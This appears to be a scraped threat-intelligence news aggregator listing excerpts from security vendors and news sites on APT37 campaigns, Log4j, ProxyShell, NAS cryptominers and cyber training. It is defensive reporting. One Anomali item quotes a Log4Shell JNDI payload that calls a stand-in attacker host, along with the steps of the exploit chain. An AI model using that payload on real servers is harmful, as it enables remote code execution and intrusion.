What's new around the internet

Last one

Src Date (GMT) Title Description Tags Stories Notes
Volexity.webp 2022-03-22 16:12:11 Storm Cloud on the Horizon: GIMMICK Malware Strikes at macOS
(direct link)
> In late 2021, Volexity discovered an intrusion in an environment monitored as part of its Network Security Monitoring service. Volexity detected a system running frp, otherwise known as fast reverse proxy, and subsequently detected internal port scanning shortly afterward. This traffic was determined to be unauthorized and the system, a MacBook Pro running macOS 11.6 (Big Sur), was isolated for further forensic analysis. Volexity was able to run Surge Collect to acquire system memory (RAM) and select files of interest from the machine for analysis. This led to the discovery of a macOS variant of a malware implant Volexity calls GIMMICK. Volexity has encountered Windows versions of the malware family on several previous occasions. GIMMICK is used in targeted attacks by Storm Cloud, a Chinese espionage threat actor known to attack organizations across Asia. It is a feature-rich, multi-platform malware family that uses public cloud hosting services (such as Google […]
Malware Threat Cloud ★★★
CyberSkills.webp 2022-03-16 00:00:00 Cyber Security - The Value and Need for Practical Training
(direct link)
Whenever we are trying to master a new skill, we have all heard about the importance of practise. The associated attention, rehearsal and repetition lead to the acquisition of new knowledge or skills that can later be developed into more complex skillsets. This sentiment has been seen throughout history, where some of the world's most masterful people have shared a similar philosophy that is still true today: Bruce Lee - “Practice makes perfect. After a long time of practising, our work will become natural, skillful, swift and steady” Abraham Lincoln - “Give me six hours to chop down a tree and I will spend the first four sharpening the axe.” Japanese Proverb – “Tomorrow's battle is won during today's practice” Vincent Van Gogh – “As practise makes perfect, I cannot but make progress, each drawing one makes, each study one paints is a step forward” Marshawn Lynch - “When you get to practice against the best, it brings the best out of you.” Martha Graham – “Practice means to perform, over and over again in the face of all obstacles, some act of vision, of faith, of desire. Practice is a means of inviting the perfection desired” Unknown - “Don't practise until you get it right, practice until you can't get it wrong” Others might disagree slightly: Vince Lombardi – “Practise does not make perfect. Only perfect practise makes perfect” So the message is clear: to master a skill we need to practise, but we need to practise against the best and in the most realistic environment possible. In terms of cybersecurity, as the cyber threat environment grows more intense, cyber defence groups require more and more skilled professionals to help with the onslaught of cyberattacks. However, they are finding it increasingly difficult to recruit and hire trained security professionals, as having a degree in cybersecurity is usually not enough to give an individual the skills required for mitigating sophisticated attacks. 
For Cyber Security professionals, the required practise involves realistic breach scenarios or cyberattacks. These breaches or cyberattacks are any attempt to gain unauthorized access to a computer, computing system or computer network with the intent to cause damage. The aim is to disable, disrupt, destroy or control computer systems, or to alter, block, delete, manipulate or steal the data held within these systems. Day-to-day work in cybersecurity offers few opportunities for such training on the job, which makes the required practise extremely difficult to achieve. When you think about it, cyberattacks are seemingly in the news every day, which seems to contradict my previous statement. However, the results of a cyberattack can range from causing inconvenience to dire consequences. Cyberattacks on the critical infrastructure and healthcare sectors don't just affect data or computer systems; they can wreak havoc in the physical world. This was seen all too well in Ireland in the not so distant past. So, cyberattacks are prevalent, but the consequences mean we aim to prevent as many breaches as possible and to reduce the impact of, contain and eradicate any attack that exploits a system. Therein lies the problem: cyber security professionals require realistic breach scenarios and cyberattacks to train and become sufficiently skilled, but cyber professionals are consistently working hard to prevent such attacks in the real world. So the question is, “how do we train cyber security professionals to deal with the challenging, ever-changing cyber environment?”. The answer is a Cyber Range! A Cyber Range provides a secure, sandboxed, virtual, interactive training environment that can simulate scenarios and environments with a real-world feel, including complex IT environments and attacks on IT infrastructure, networks, software platforms and applications. 
As a result, a cyber range infrastructure provides the required training and practise elements of realistic breach scenarios and cyberattacks. A Cyber Range enables students to practice newly acquire Tool Threat Studies Mobile Industrial Medical Cloud ★★
Mandiant.webp 2022-03-09 18:00:00 FedRAMP Ready: Mandiant's Latest Designation Supports Public Sector Customers
(direct link)
In yet another major milestone in its mission to make every organization secure from cyber threats, Mandiant recently announced that it achieved FedRAMP Ready designation for its first evaluated solution, Mandiant Advantage Automated Defense. Achieving readiness at the High impact level, Automated Defense is now available in the FedRAMP Marketplace as a Cloud Service Offering (CSO), allowing federal agencies to take advantage of its accelerated threat detection, prioritization and response capabilities. What is FedRAMP? FedRAMP is a government-wide program that promotes the adoption of
Threat Cloud ★★★
CyberSkills.webp 2022-02-10 00:00:00 Cyber Security – A Trojan War where we win
(direct link)
Written by Dr. Anila Mjeda, Cyber Skills Lecturer. In Ancient Greek literature, Troy is portrayed as a powerful kingdom of the Heroic Age. Troy's ability to withstand battles and attacks was due to the strength of its walls which, legend has it, were built by the Greek gods Poseidon and Apollo. This was all the more evident when Troy 'fell' after its supposedly impenetrable outer perimeter was breached. This lesson from Greek Mythology echoes ever true in today's software systems. Our Cyber Security mechanisms must be approached in a manner called 'Defence-in-depth', where a number of defence mechanisms are layered to offer better protection to the system. (Imagine the medieval castles' layers of fine battlements, towers, and 'high' and 'steep' walls.) What is most vital in Cyber Security is the innermost layer of a strong defence-in-depth. This layer should start with secure coding, which is a concept we call 'Shifting Left'. Shifting Left: Shifting left, in essence, means incorporating security at the beginning of a project, such as data collection, and incorporating security activities in each of the stages of the software development lifecycle. The shifting left metaphor stems from the fact that people whose native language is written from left to right tend to perceive left (think of the outermost left on a page) as the place where one begins their work. As a developer, will your application need to handle credit card data? Will the users of your application be allowed to upload their own files to the system, and which third-party components will you be using in the system? These are but a fraction of the security considerations to be analysed from the beginning of any project. Today's software systems are inherently interconnected, and we cannot simply draw up the bridge and defend our systems medieval style. Software systems use libraries, APIs, microservices and in general a variety of components that translate to an end-product. 
There are complex dependencies, many of which are on third-party software. Furthermore, modern approaches such as Continuous Integration / Continuous Deployment (CI/CD) pipelines, Infrastructure as Code (IaC), Security as Code (SaC), Platform as a Service (PaaS), and Infrastructure as a Service (IaaS) push more functionality into the software domain. This blurring of the boundaries means that security is not the job of only the security professionals, and calls for the development team to play a crucial role in it. Software developers are talented and inventive creators and, as cyber-attacks increase in number and severity, it is vital they collaborate closely with the security professionals and get the proper training to interweave security into their creations. While proper training of developers is the real answer to preventing vulnerabilities creeping into our apps, if I were to start from one element, it would be the mentality of Zero-Trust. While I do not recommend it as a mentality for life, I do very much recommend it in all things cybersecurity. The Zero-Trust concept extends from infrastructure to software. In fact, one aspect of our software which, if we get it right, would solve most of our security woes is zero-trusting all inputs. Zero-Trust Your Inputs: Language purists might forgive this conversion of zero-trust into a verb, on the grounds that placing no trust in any input (even when it comes from your own system) would help us mitigate most of our security troubles. You may be asking, “Why don't we just do it then, and 'solve' security once and for all?”. Part of the difficulty lies in identifying every single input. Did we identify all the cloud workflows that can trigger our serverless functions? Are there any unforeseen ways into our database (hello, injection vulnerabilities)? Can an attacker give instructions to the server and as a result gain access they should not have (Server-Side Request Forgery (SSRF) vulnerabilities)? 
Can our web-based system be commandeered to attack our legitimate users (Cross Site Scripting (XSS) v Vulnerability Cloud ★★
Mandiant.webp 2022-02-02 13:00:00 Announcing Mandiant Advantage Attack Surface Management
(direct link)
Want to jump in now? Get started with Mandiant Advantage Attack Surface Management by creating your free account today! As organizations continue to digitize their business and employees are empowered to leverage these capabilities, it's no wonder security teams struggle to keep track of infrastructure, applications, cloud services and SaaS usage, let alone ensure security policies are adhered to across these environments. The attack surface is dramatically and vastly expanding, and without the proper automation, it is unlikely that security teams will have the visibility, control, and
Cloud ★★
kovrr.webp 2022-01-19 00:00:00 What Emerging Cybersecurity Trends Should Enterprises Be Aware Of? As the world becomes more digitally connected, enterprises need to be aware of the growing cybersecurity risks.
(direct link)
As the world becomes more digitally connected every year — and with the pandemic further accelerating digital transformation — all types of enterprises need to be aware of the growing cybersecurity risks that come with this shift. In Europe, for example, significant attacks on critical sectors more than doubled in 2020 compared to 2019, according to data from the European Union Agency for Cybersecurity, as reported by CNN. In 2021, the picture arguably became even bleaker around the world, with major ransomware attacks causing disruption to companies in industries ranging from energy to meat processing. In the first six months of 2021 alone, ransomware-related reported activity in the U.S. had a higher total value ($590 million) than all ransomware-related reported suspicious activity in the U.S. in 2020, according to the U.S. Department of Treasury's Financial Crimes Enforcement Network (FinCEN). The total number of suspicious events filed in the first six months of 2021 in the U.S. also exceeded all of what occurred in the country in 2020 by 30%, the agency reports. Yet it's not just ransomware that's wreaking havoc. Enterprises also need to be prepared for cyber threats like denial of service (DoS) attacks, where a flood of network activity can interrupt servers, thereby causing business interruption. Cisco predicts that distributed denial of service (DDoS) attacks (a subset of DoS which involves using multiple devices to send a flood of traffic, as opposed to just one device in a DoS attack) globally will roughly “double from 7.9 million in 2018 to 15.4 million by 2023.” In addition to preparing for these types of cyberattacks, enterprises will also increasingly need to be aware of and comply with privacy-related regulations. As governments around the world try to bolster their cybersecurity responses, they are passing or at least considering new rules and guidance around how companies need to handle sensitive data and privacy issues. 
Amidst this preparation, enterprises also need to recognize that cybersecurity plans aren't foolproof, especially as attacks evolve. That means assets could be at risk even with solid defenses in place. So, enterprises increasingly need to think not just about how to prevent cyber attacks but also about the dollar-value cost of risk, given that events will inevitably occur. This process, known as cyber risk quantification — a form of financial quantification — helps enterprises think about and discuss cyber risk in definitive business terms. Knowing how much money is at stake and how different cyber events could affect revenue and profit can help businesses prioritize defenses and take mitigating action like securing cyber insurance. In this report, we'll take a closer look at these emerging cybersecurity trends that enterprises should be aware of. Understanding these areas can help organizations potentially improve their risk management, both from a cybersecurity and an overall governance standpoint. Evolving Ransomware Risks: While ransomware is not a new type of threat, the scale and intensity of ransomware continue to broaden. Enterprises large and small, across all types of industries, need to be prepared for these cyber attacks. For one, ransomware-as-a-service, “where ransomware variants are licensed to individuals and accomplices to execute attacks,” as Reuters explains, has been on the rise. Based on suspicious activity reports, FinCEN identified 68 ransomware variants in the first half of 2021. “The resulting emergence of new attackers has led to increased uncertainty and volatility for companies in responding to attacks due to the lack of information on the growing number of ransomware threat actors,” adds Reuters. Part of the problem is also that ransomware attacks aren't just being launched on an ad-hoc basis by individuals. Instead, there's in Ransomware Tool Threat Prediction Cloud ★★★
Pirate.webp 2022-01-14 13:36:57 Ongoing malware campaign exploiting public cloud infrastructure (direct link) An ongoing malware campaign was recently documented by Cisco's Talos group. According to its experts, it exploits public cloud infrastructure such as Amazon's AWS and Microsoft's Azure cloud services. In light of this attack, cybercriminals are now opting for a fully dynamic attack infrastructure in order to evade detection of the initial distribution and access. The post "Ongoing malware campaign exploiting public cloud infrastructure" first appeared on UnderNews. Malware Cloud
Anomali.webp 2021-12-15 16:00:00 Anomali Cyber Watch: Apache Log4j Zero-Day Exploit, Google Fighting Glupteba Botnet, Vixen Panda Targets Latin America and Europe, and More (direct link) The various threat intelligence stories in this iteration of the Anomali Cyber Watch discuss the following topics: Apache, Botnets, China, Espionage, Java, Russia, USB, and Vulnerabilities. The IOCs related to these stories are attached to Anomali Cyber Watch and can be used to check your logs for potential malicious activity. Figure 1 - IOC Summary Charts. These charts summarize the IOCs attached to this magazine and provide a glimpse of the threats discussed. Trending Cyber News and Threat Intelligence Countless Servers Are Vulnerable to Apache Log4j Zero-Day Exploit (published: December 10, 2021) A critical vulnerability, registered as CVE-2021-44228, has been identified in Apache Log4j 2, an open source Java logging package. The Apache Software Foundation (ASF) rates the vulnerability as a 10 on the Common Vulnerability Scoring System (CVSS) scale. Cisco Talos has observed malicious activity related to CVE-2021-44228 beginning on December 2, 2021. This vulnerability affects millions of users, and proof-of-concept exploitation code exists; LunaSec explains how it is exploited in five simple steps. These include: 1: Data from the user gets sent to the server (via any protocol). 2: The server logs the data in the request, which contains the malicious payload: ${jndi:ldap://attacker.com/a} (where attacker.com is an attacker-controlled server). 3: The Log4j vulnerability is triggered by this payload and the server makes a request to attacker.com via the "Java Naming and Directory Interface" (JNDI). 4: The response contains a path to a remote Java class file (e.g. http://second-stage.attacker.com/Exploit.class) which is injected into the server process. 5: This injected payload triggers a second stage and allows an attacker to execute arbitrary code. 
Analyst Comment: Log4j version 2.15.0 has been released to address this vulnerability; however, it only changes a default setting (log4j2.formatMsgNoLookups) from false to true. This means that if the setting is set back to false, Log4j will again be vulnerable to exploitation. The initial campaigns could have been detected by filtering on certain keywords such as "ldap" and "jndi", but this detection method is easily bypassable. MITRE ATT&CK: [MITRE ATT&CK] Exploit Public-Facing Application - T1190 | [MITRE ATT&CK] Exploitation for Client Execution - T1203 | [MITRE ATT&CK] Command and Scripting Interpreter - T1059 | [MITRE ATT&CK] Remote Services - T1021 | [MITRE ATT&CK] OS Credential Dumping - T1003 | [MITRE ATT&CK] Resource Hijacking - T1496 | [MITRE ATT&CK] Network Denial of Service - T1498 Tags: Log4j, CVE-2021-44228, Log4j2, Log4Shell, Apache, Zero-day, Java, Jndi, Class file Over a Dozen Malicious NPM Packages Caught Hijacking Discord Servers (published: December 8, 2021) Researchers from the DevOps firm JFrog have found at least 17 malicious packages on the open source npm Registry for JavaScript. The names of the packages are: prerequests-xcode (version 1.0.4), discord-selfbot-v14 (version 12.0.3), discord-lofy (version 11.5.1), discordsystem (version 11.5.1), discord-vilao (version 1.0.0), fix-error (version 1 Malware Tool Vulnerability Threat Cloud APT 37 APT 29 APT 15 APT 15 APT 25
Mandiant.webp 2021-12-14 16:00:00 Azure Run Command for Dummies
(direct link)
In Mandiant's recent blog post, we detailed suspected Russian intrusion activity that targeted managed services providers (MSP) to gain access to their customers' cloud environments. Other companies, such as Microsoft, have observed similarly targeted activity against customers of several cloud and managed service providers. One notable technique from these intrusions is the use of Azure Run Commands to move laterally from managed hypervisors to the MSP customers' underlying virtual machines. This latest blog post comes as a supplementary annex to highlight Azure Run Commands and provide
Cloud ★★
The_Hackers_News.webp 2021-12-07 22:33:02 Warning: Yet Another Bitcoin Mining Malware Targeting QNAP NAS Devices (direct link) Network-attached storage (NAS) appliance maker QNAP on Tuesday released a new advisory warning of a cryptocurrency mining malware targeting its devices, urging customers to take preventive steps with immediate effect. "A bitcoin miner has been reported to target QNAP NAS. Once a NAS is infected, CPU usage becomes unusually high where a process named '[oom_reaper]' could occupy around 50% of the Malware Cloud APT 37
Anomali.webp 2021-12-07 16:04:00 Anomali Cyber Watch: Nginx Trojans, BlackByte Ransomware, Android Malware Campaigns, and More (direct link) The various threat intelligence stories in this iteration of the Anomali Cyber Watch discuss the following topics: APT, Ransomware, Maldocs, E-Commerce, Phishing, and Vulnerabilities. The IOCs related to these stories are attached to Anomali Cyber Watch and can be used to check your logs for potential malicious activity. Figure 1 - IOC Summary Charts. These charts summarize the IOCs attached to this magazine and provide a glimpse of the threats discussed. Trending Cyber News and Threat Intelligence New Malware Hides as Legit Nginx Process on E-Commerce Servers (published: December 2, 2021) Researchers at Sansec discovered NginRAT, a new malware variant that has been found on servers in the US, Germany, and France. Put in place to intercept credit card payments, this malware impersonates legitimate nginx processes, which makes it very difficult to detect. NginRAT has shown up on systems that were previously infected with CronRAT, a trojan that schedules processes to run on invalid calendar days. This is used as a persistence technique to ensure that even if a malicious process is killed, the malware has a way to re-infect the system. Analyst Comment: Threat actors are always adapting to the security environment to remain effective. New techniques can still be spotted with behavioural analysis defenses and social engineering training. Ensure that your company's firewall blocks all entry points for unauthorized users, and maintain records of how normal traffic appears on your network. That way, it will be easier to spot unusual traffic and connections to and from your network and potentially identify malicious activity. 
MITRE ATT&CK: [MITRE ATT&CK] Obfuscated Files or Information - T1027 | [MITRE ATT&CK] Shared Modules - T1129 Tags: NginRAT, CronRAT, Nginx, North America, EU How Phishing Kits Are Enabling A New Legion Of Pro Phishers (published: December 2, 2021) Phishing kits, such as XBALTI are seeing increased use against financial institutions. Mixing email with SMS messages, attackers are targeting companies such as Charles Schwab, J.P. Morgan Chase, RBC Royal Bank and Wells Fargo. Victims are targeted and asked to verify account details. The attack is made to appear legitimate by redirecting to the real sites after information has been harvested. Analyst Comment: With financial transactions increasing around this time of year, it is likely financially themed malspam and phishing emails will be a commonly used tactic. Therefore, it is crucial that your employees are aware of their financial institution's policies regarding electronic communication. If a user is concerned due to the scare tactics often used in such emails, they should contact their financial institution via legitimate email or another form of communication. Requests to open a document in a sense of urgency and poor grammar are often indicative of malspam or phishing attacks. Said emails should be properly avoided and reported to the appropriate personnel. Tags: Phishing, XBATLI Injection is the New Black: Novel RTF Template Inject Technique Poised for Widespread Adoption Beyond APT Actors (pub Ransomware Malware Tool Vulnerability Threat Cloud APT 37 ★★★★
SecurityAffairs.webp 2021-12-07 15:28:27 Bitcoin Miner [oom_reaper] targets QNAP NAS devices (direct link) Taiwanese vendor QNAP warns customers of ongoing attacks targeting their NAS devices with cryptocurrency miners. Taiwanese vendor QNAP warns customers of threat actors targeting their NAS devices with cryptocurrency miners. Upon compromising the devices, the miner will create a new process named [oom_reaper] that allows threat actors to mine Bitcoin. The above process could occupy […] Threat Cloud APT 37
SecurityWeek.webp 2021-11-30 12:24:19 North Korean Hackers Use New 'Chinotto' Malware to Target Windows, Android Devices (direct link) Kaspersky has analyzed a new espionage campaign conducted by the threat actor named ScarCruft, and the security firm's researchers have uncovered a previously unknown malware that has been used to target Windows and Android devices. Malware Threat Cloud APT 37
Fortinet.webp 2021-11-30 11:24:48 Recent APT37 Activity and Chinotto, a Multi Platform Infostealer (direct link) FortiGuard Labs is aware of reports of recent activity from APT37. APT37 is a nation-state threat actor attributed to North Korea. The latest discovery by researchers at Kaspersky Labs has revealed a sophisticated, targeted attack that utilizes stolen credentials from Facebook and email accounts belonging to an associate of the targeted victim. The victim was socially engineered and compelled into opening rar zipped attachments purporting to be from the trusted sender that contained a malicious Word document. The Word document is multi-stage in design, and uses a malicious macro to initiate the first stage. The first stage detects the presence of AV software and, if AV is not present, initiates the second stage, which is shellcode that downloads the final, third-stage payload. Ultimately, after several months of dwelling undetected on the infected system, the backdoor downloads the multiplatform infostealer "Chinotto." Windows variants were sent via spearphishing emails and Android variants were sent via SMShing texts. What Operating Systems are Affected? Chinotto targets Windows and Android based operating systems. Is This Limited to Targeted Attacks? Yes. How Serious of an Issue is This? Medium. What is APT37? APT37 (also known as GROUP123 and Scarcruft), attributed to North Korean threat actors, has been in operation for several years. During that time, APT37 has been attributed to the Adobe Flash zero-day attack (CVE-2018-4878) that targeted researchers based in South Korea who were performing research on North Korea. APT37 focuses on various organizations with an interest in North Korea. APT37 is famous for exploiting vulnerabilities in the Hangul Word Processor (HWP), which is commonly used in South Korea, especially by those in the government sector. 
Analysis suggests that this is a very detailed and sophisticated threat actor with an arsenal of malware and exploits at their disposal that targets various verticals and organizations with specially crafted campaigns. Other vectors besides the Adobe and Hangul vulnerabilities observed were the usage of Microsoft vulnerabilities as well, specifically CVE-2017-0199 (Microsoft Office UAC bypass) and CVE-2015-2545 (Microsoft Office Encapsulated PostScript (EPS)). For further details on the exploitation of HWP documents and campaigns previously analyzed, please refer to our blog here. What is the Status of Coverage? FortiGuard Labs has AV coverage in place for publicly available samples as: VBA/Agent.AAK!tr, W32/PossibleThreat, VBA/Agent.AF3C!tr, W32/Agent.ACDD!tr, PossibleThreat.MU, PossibleThreat.PALLAS.H, W32/FRS.VSNTGF20!tr, W32/Bsymem.MSJ!tr. All network IOCs are blocked by the WebFiltering client. Any Other Suggested Mitigation? Due to the ease of disruption and the potential for damage to daily operations, reputation, and unwanted release of personally identifiable information (PII), etc., it is important to keep all AV and IPS signatures up to date. It is also important to ensure that all known vendor vulnerabilities are addressed and updated to protect from attackers having a foothold within a network. Attackers are well aware of the difficulty of patching, and if it is determined that patching is not feasible at this time, an assessment should be conducted to determine risk. Also, as this campaign was sent via spearphishing and smishing, organizations are encouraged to conduct ongoing training sessions to educate and inform personnel about the latest phishing/spearphishing/smishing attacks. They also need to encourage employees to never open attachments from someone they don't know, and to always treat emails from unrecognized/untrusted senders with caution. 
Since it has been reported that various phishing/spearphishing/smishing attacks have been delivered via social engineering distribution mechanisms, it is crucial that end users within an organization be made aware of the various types of attacks being delivered. This can be accomplished through regular training sessions and impromptu tests using predetermined templates by an organization's internal security department. Si Malware Threat Patching Cloud APT 37
SecureList.webp 2021-11-29 10:00:31 ScarCruft surveilling North Korean defectors and human rights activists (direct link) The ScarCruft group (also known as APT37 or Temp.Reaper) is a nation-state sponsored APT actor. Recently, we had an opportunity to perform a deeper investigation on a host compromised by this group. Cloud APT 37
bleepingcomputer.webp 2021-11-29 08:43:29 APT37 targets journalists with Chinotto multi-platform malware (direct link) North Korean state hacking group APT37 targets South Korean journalists, defectors, and human rights activists in watering hole, spear-phishing email, and smishing attacks delivering malware dubbed Chinotto, capable of infecting Windows and Android devices. [...] Malware Cloud APT 37
The_Hackers_News.webp 2021-11-29 05:14:10 New Chinotto Spyware Targets North Korean Defectors, Human Rights Activists (direct link) North Korean defectors, journalists who cover North Korea-related news, and entities in South Korea are being zeroed in on by a nation-state-sponsored advanced persistent threat (APT) as part of a new wave of highly targeted surveillance attacks. Russian cybersecurity firm Kaspersky attributed the infiltrations to a North Korean hacker group tracked as ScarCruft, also known as APT37, Reaper Threat Cloud APT 37
SecurityAffairs.webp 2021-11-19 15:14:40 North Korea-linked TA406 cyberespionage group activity in 2021 (direct link) North Korea-linked TA406 APT group has intensified its attacks in 2021, particularly credential harvesting campaigns. A report published by Proofpoint revealed that the North Korea-linked TA406 APT group (Kimsuky, Thallium, Konni, Black Banshee, Velvet Chollima) has intensified its operations in 2021. The TA406 cyber espionage group was first spotted by Kaspersky researchers in 2013. At the end of October […] Cloud APT 37
2021-11-10 14:11:03 North Korean attackers use malicious blogs to deliver malware to high-profile South Korean targets (direct link) By Jung soo An and Asheer Malhotra, with contributions from Kendall McKay. Cisco Talos has observed a new malware campaign operated by the Kimsuky APT group since June 2021. Kimsuky, also known as Thallium and Black Banshee, is a North Korean state-sponsored advanced... Malware Cloud APT 37
Mandiant.webp 2021-11-02 08:01:01 Mandiant Data Science Showcases Latest Security Machine Learning Research at CAMLIS '21
(direct link)
The Mandiant Data Science (MDS) team's mission is to develop innovative machine learning solutions that apply Mandiant's unique expertise and threat intelligence at scale for our customers. MDS is involved in many diverse projects delivered as part of the Mandiant Advantage SaaS platform, but we also present and publish cutting-edge research at the intersection of security and machine learning at leading industry and academic conferences. We are proud to announce that our team recently had four talks accepted at the Conference on Applied Machine Learning in Information Security (CAMLIS)
Threat Cloud ★★★
CyberSkills.webp 2021-11-01 00:00:00 Cyber Skills - What You Need to Know
(direct link)
Cyber Skills – Building Ireland's Cyber Security Skills. Cyber Skills is a national programme funded by the Higher Education Authority Pillar 3 Human Capital Initiative. In collaboration with Munster Technological University, University College Dublin, Technological University Dublin, and University of Limerick, we are committed to addressing the skills shortage in Cyber Security. We provide online, fully flexible, university-accredited micro-credentials and pathways. We empower the learner by offering a wide range of modules or specifically designed courses, all of which have been aligned to the NIST NICE Cyber Security framework. As a Cyber Skills graduate you will be workplace ready with the skills and knowledge needed to advance in your career.
Micro-Credentials: A micro-credential is a short, accredited module of learning. Cyber Skills micro-credentials are 5-10 credits and can be used towards a major award. We offer the control and flexibility to choose the micro-credentials you need to build your own training programme. To view our micro-credentials, click here.
Pathways: Choose a pathway that has been specially designed in close collaboration with industry based on the needs of the workplace. Our pathways consist of micro-credentials which are tailored to specific in-demand job roles needed by industry. To view our pathways, click here.
Why should I up-skill my team? Cyber Security is now a priority for every business across all industries. A high percentage of cyber-attacks come through a lack of knowledge. Managers can no longer rely solely on cyber security software, but must invest in staff education to identify a cyber threat and the upskilling needed to prevent it. By educating your staff through Cyber Skills you are ensuring that they can protect and recover computer systems, devices, programs and networks from any type of cyber-attack.
Why should I up-skill? Cyber Security is the fastest growing, in-demand field of ICT and there is a significant shortage of skills in this sector globally. Therefore, with cybersecurity qualifications your skillset is among the most sought after in organisations. Become part of a highly dynamic industry and know that your role is playing an important part in society today.
Why Choose Cyber Skills? “We are committed to empowering the individual in order to eradicate cyber vulnerability.” Cyber Skills is the only place where you can find a course that has been specifically designed and created by industry and academia experts. Working closely with our industry partners Dell and MasterCard, we have designed courses informed by the needs of the workplace to enhance the skills of networking and software development professionals. Our lecturers come from multi-disciplinary backgrounds, with a passion for cybersecurity. Combining years of experience with expert knowledge, our lecturers enable students to achieve their goals.
Cyber Range: Cyber Skills benefits from the first of its kind, world-class, cloud-based Cyber Range. The Cyber Range provides a secure, sandboxed area which simulates real-world scenarios and environments where students can test their new skills. Labs and assignments will be used to reinforce the content from the lectures. A full range of scenarios will provide the opportunity to test the vast array of techniques required to keep ahead in this challenging, ever-changing environment.
Recognition of Prior Learning: Candidates who have gained relevant knowledge and skills through informal study or experiential means can apply for Cyber Skills Pathways and Micro-Credentials. We will discuss with an applicant their experiences to ensure our courses will be of benefit to their career.
Vulnerability Threat Studies Cloud ★★
Anomali.webp 2021-08-24 17:11:00 Anomali Cyber Watch: ProxyShell Being Exploited to Install Webshells and Ransomware, Neurevt Trojan Targeting Mexican Users, Secret Terrorist Watchlist Exposed, and More (direct link) The various threat intelligence stories in this iteration of the Anomali Cyber Watch discuss the following topics: APT37 (InkySquid), BlueLight, Ransomware, T-Mobile Data Breach, Critical Vulnerabilities, IoT, Kalay, Neurevt, and ProxyShell. The IOCs related to these stories are attached to Anomali Cyber Watch and can be used to check your logs for potential malicious activity. Figure 1 - IOC Summary Charts. These charts summarize the IOCs attached to this magazine and provide a glimpse of the threats discussed. Current Anomali ThreatStream users can query these indicators under the “anomali cyber watch” tag.
Trending Cyber News and Threat Intelligence
Microsoft Exchange Servers Still Vulnerable to ProxyShell Exploit (published: August 23, 2021) Despite patches for a collection of vulnerabilities (ProxyShell) discovered in Microsoft Exchange being available in the July 2021 update, researchers discovered that nearly 2,000 servers exposed to these vulnerabilities have recently been compromised to host webshells. These webshells allow attackers to retain backdoor access to compromised servers for further exploitation and lateral movement into the affected organizations. Researchers believe that these attacks may be related to the recent LockFile ransomware attacks. Analyst Comment: Organizations running Microsoft Exchange are strongly encouraged to prioritize updates to prevent ongoing exploitation of these vulnerabilities. In addition, a thorough investigation to discover and remove planted webshells should be undertaken, as the patches will not remove webshells already planted in their environments. A threat intelligence platform (TIP) such as Anomali ThreatStream can be a valuable tool to assist organizations in ingesting current indicators of compromise (IOCs) and determining whether their Exchange instances have been compromised.
MITRE ATT&CK: [MITRE ATT&CK] Exploitation for Client Execution - T1203 | [MITRE ATT&CK] Web Shell - T1100 | [MITRE ATT&CK] Hidden Files and Directories - T1158 | [MITRE ATT&CK] Source - T1153
Tags: CVE-2021-34473, CVE-2021-34523, CVE-2021-31207, Exchange, ProxyShell, backdoor
LockFile: Ransomware Uses PetitPotam Exploit to Compromise Windows Domain Controllers (published: August 20, 2021) A new ransomware family, named LockFile by Symantec researchers, has been observed on the network of a US financial organization. The first known instance of this ransomware was July 20, 2021, and activity is ongoing. This ransomware has been seen largely targeting organizations in a wide range of industries across the US and Asia. The initial access vector remains unknown at this time, but the ransomware leverages the incompletely patched PetitPotam vulnerability (CVE-2021-36942) in Microsoft's Exchange Server to pivot to Domain Controllers (DCs), which are then leveraged to deploy ransomware tools to devices that connect to the DC. The attackers appear to remain resident on the network for several Ransomware Malware Tool Vulnerability Threat Patching Cloud APT 37
SecurityAffairs.webp 2021-08-19 06:47:34 NK-linked InkySquid APT leverages IE exploits in recent attacks (direct link) North Korea-linked InkySquid group leverages two Internet Explorer exploits to deliver a custom implant in attacks aimed at a South Korean online newspaper. Experts from cybersecurity firm Volexity reported that North Korea-linked InkySquid group (aka ScarCruft, APT37, Group123, and Reaper) leverages two Internet Explorer exploits to deliver a custom backdoor in watering hole attacks aimed at the […] Cloud APT 37
The_Hackers_News.webp 2021-08-18 01:33:33 NK Hackers Deploy Browser Exploits on South Korean Sites to Spread Malware (direct link) A North Korean threat actor has been discovered taking advantage of two exploits in Internet Explorer to infect victims with a custom implant as part of a strategic web compromise (SWC) targeting a South Korean online newspaper. Cybersecurity firm Volexity attributed the attacks to a threat actor it tracks as InkySquid, more widely known by the monikers ScarCruft and APT37. Daily NK, the Malware Threat Cloud APT 37
Mandiant.webp 2021-08-10 03:38:14 An Intriguing Update to Mandiant Advantage
(direct link)
Today Mandiant made a significant announcement in furthering the capabilities of the Mandiant Advantage SaaS platform with the acquisition of an emerging Attack Surface Management (ASM) leader, Intrigue. With this acquisition we also welcome Jonathan Cran and the Intrigue team to the Mandiant family. We are very excited to have Jonathan, a known industry visionary and entrepreneur, join Mandiant as we continue to build out our Advantage capabilities. ASM is quickly emerging, driving value through asset and exposure visibility in the internet-facing attack surface. It fills a gap between asset
Cloud ★★★★
Mandiant.webp 2021-06-02 10:00:00 A New Future for FireEye and Mandiant: Accelerating Opportunities
(direct link)
With today's announcement of the sale of the FireEye Products business to Symphony Technology Group (STG), we have taken an important step forward to help us better serve our customers and accelerate strategies that are defining the future of cyber security. The transaction will separate FireEye's network, email, endpoint, and cloud security products, and related security management and orchestration platform, from Mandiant Solutions' controls-agnostic software and services. The result: both organizations will be able to accelerate growth investments, pursue new go-to-market pathways, and
Cloud ★★★
InfoSecurityMag.webp 2021-02-11 11:00:00 UN Links North Korea to $281m Crypto Exchange Heist (direct link) Most funds recovered, but attack bears hallmarks of hermit kingdom. Cloud APT 37
The_Hackers_News.webp 2021-01-08 01:54:44 ALERT: North Korean hackers targeting South Korea with RokRat Trojan (direct link) A North Korean hacking group has been found deploying the RokRat Trojan in a new spear-phishing campaign targeting the South Korean government. Attributing the attack to APT37 (aka ScarCruft, Ricochet Chollima, or Reaper), Malwarebytes said it identified a malicious document last December that, when opened, executes a macro in memory to install the aforementioned remote access tool (RAT). "The Tool Cloud APT 37
MalwarebytesLabs.webp 2021-01-06 15:14:45 Retrohunting APT37: North Korean APT used VBA self decode technique to inject RokRat (direct link) A North Korean threat group has swapped the usual Hangul Office lures for a cleverly packed Office macro. Categories: Social engineering, Threat analysis. Threat Cloud APT 37
bleepingcomputer.webp 2021-01-05 11:55:57 North Korean software supply chain attack targets stock investors (direct link) North Korean hacking group Thallium, aka APT37, has been targeting a private stock investment messenger service in a supply chain attack, as reported this week. [...] Cloud APT 37
kovrr.webp 2020-11-17 00:00:00 CRIMZON™: The Data Behind the Framework. A report that highlights a subset of the empirical validation for the CRIMZON™ framework. (direct link)
